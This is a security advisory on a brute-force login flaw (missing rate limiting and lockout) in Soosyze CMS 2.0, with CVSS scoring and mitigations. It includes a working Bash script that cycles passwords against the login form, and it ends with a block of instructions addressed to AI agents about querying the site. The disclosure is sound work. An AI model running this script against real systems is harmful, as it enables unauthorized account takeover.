# Brute Force Login Vulnerability in Soosyze CMS 2.0 (CVE-2025-52392) **Author:** Beatriz Fresno Naumova (beafn28) **Date:** 13/08/2025 **Vendor:** Soosyze **Product:** Soosyze CMS **Version Affected:** 2.0 (confirmed) **Component:** /user/login – Authentication Controller **CWE:** [CWE-307: Improper Restriction of Excessive Authentication Attempts](https://cwe.mitre.org/data/definitions/307.html) **Attack Vector:** Remote (network exploitable) ### Description Soosyze CMS 2.0 contains a vulnerability in the /user/login authentication endpoint that allows unlimited credential-guessing attempts due to the absence of rate limiting and account lockout mechanisms. A remote, unauthenticated attacker can submit unlimited HTTP POST requests with varying passwords for a known username/email without triggering any throttling, delay, or lockout. The vulnerability can be exploited using automated tools such as THC Hydra, Burp Suite Intruder, or custom scripts, enabling brute-force attacks that may lead to compromise of administrative accounts. Testing confirmed that the server issues a valid login form and CSRF token on every request, and accepts repeated authentication attempts without introducing timing penalties or invalidating sessions. No vendor patch or mitigation was available at the time of publication. ### Impact Successful exploitation may allow: * Account Compromise: Unauthorized access to valid user accounts. * Administrative Takeover: Full compromise of the CMS instance if administrative credentials are obtained. * Data Exposure/Modification: Unrestricted access to protected content and potential injection of malicious configurations or content. ### Attack Details Attack Vector (AV): Network (N) Attack Complexity (AC): Low (L) Privileges Required (PR): None (N) User Interaction (UI): Required (R) Scope (S): Unchanged (U) Confidentiality (C): Low (L) Integrity (I): Low (L) Availability (A): None (N) ``` CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N ``` **CVSS v3.1 Base Score: 5.4 (Medium)** ### Proof of Concept (PoC) #### Overview The following PoC demonstrates a brute-force authentication vulnerability in **Soosyze CMS 2.0** at the `/user/login` endpoint.\ The issue is caused by **missing rate limiting and account lockout mechanisms**, allowing an attacker to try unlimited password guesses. **Steps to Reproduce** 1. Deploy or access a Soosyze CMS 2.0 instance. 2. Identify a valid username or email address (e.g., ). 3. Prepare a password dictionary (e.g., rockyou.txt). 4. Execute the provided Bash PoC script to perform automated POST login attempts. #### PoC Script {% embed url="" %} ```bash #!/usr/bin/env bash # Author: Beatriz Fresno Naumova (beafn28) # Usage: # ./script.sh [wordlist.txt] # If no wordlist is provided, a dictionary will be used. set -euo pipefail BASE_URL="http://localhost:8000" LOGIN_PATH="/user/login" EMAIL_FIELD="email" PASS_FIELD="password" TARGET_EMAIL="test@test.com" WORDLIST_FILE="${1:-}" DEFAULT_WORDS=("123456" "admin" "password" "qwerty" "letmein" "admin123" "password1") form_url="$BASE_URL$LOGIN_PATH" COOKIE_JAR="$(mktemp)" get_form() { curl -sS -c "$COOKIE_JAR" -b "$COOKIE_JAR" "$form_url" > /tmp/login_page.html } extract_token() { local name value name=$(sed -nE 's/.*name="([_a-zA-Z0-9:-]*(token|csrf)[_a-zA-Z0-9:-]*)".*type="hidden".*/\1/p' /tmp/login_page.html | head -n1 || true) value="" if [[ -n "$name" ]]; then value=$(sed -nE "s/.*name=\"$name\".*value=\"([^\"]*)\".*/\1/p" /tmp/login_page.html | head -n1 || true) fi printf '%s\t%s\n' "$name" "$value" } post_login() { local pass="$1" tname="$2" tval="$3" curl -sS -o /tmp/resp.html -w "%{http_code}" \ -c "$COOKIE_JAR" -b "$COOKIE_JAR" \ -X POST "$form_url" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Origin: $BASE_URL" -H "Referer: $form_url" \ --data-urlencode "$EMAIL_FIELD=$TARGET_EMAIL" \ --data-urlencode "$PASS_FIELD=$pass" \ $( [[ -n "$tname" && -n "$tval" ]] && printf -- '--data-urlencode %s=%s' "$tname" "$tval" ) } echo "[*] Starting brute-force attack on $form_url" [[ -n "$WORDLIST_FILE" && -r "$WORDLIST_FILE" ]] && mapfile -t words < "$WORDLIST_FILE" || words=("${DEFAULT_WORDS[@]}") i=0 for pw in "${words[@]}"; do i=$((i+1)) get_form IFS=$'\t' read -r TOKEN_NAME TOKEN_VALUE < <(extract_token) code=$(post_login "$pw" "$TOKEN_NAME" "$TOKEN_VALUE") if grep -q '"redirect"' /tmp/resp.html; then echo -e "[$i] Password found: '\e[1m$pw\e[0m' (HTTP $code)" break else echo "[$i] '$pw' (HTTP $code)" fi sleep 0.$((RANDOM%9+1)) done rm -f "$COOKIE_JAR" /tmp/resp.html ``` #### Execution example ``` ./poc.sh rockyou.txt ```
### Mitigation * Implement server-side rate limiting (e.g., maximum 5 failed attempts per minute per IP). * Apply temporary account lockout after multiple failed attempts. * Introduce CAPTCHA or other bot-mitigation mechanisms after repeated failed logins. * Consider logging and monitoring repeated failed authentication attempts. ### Discoverer Beatriz Fresno Naumova (beafn28) ### References * **CVE:** [CVE-2025-52392](https://www.cve.org/CVERecord?id=CVE-2025-52392) * **NIST:** * **Exploit Database:** * **Public advisory:** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/cve-and-poc/brute-force-login-vulnerability-in-soosyze-cms-2.0-cve-2025-52392.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.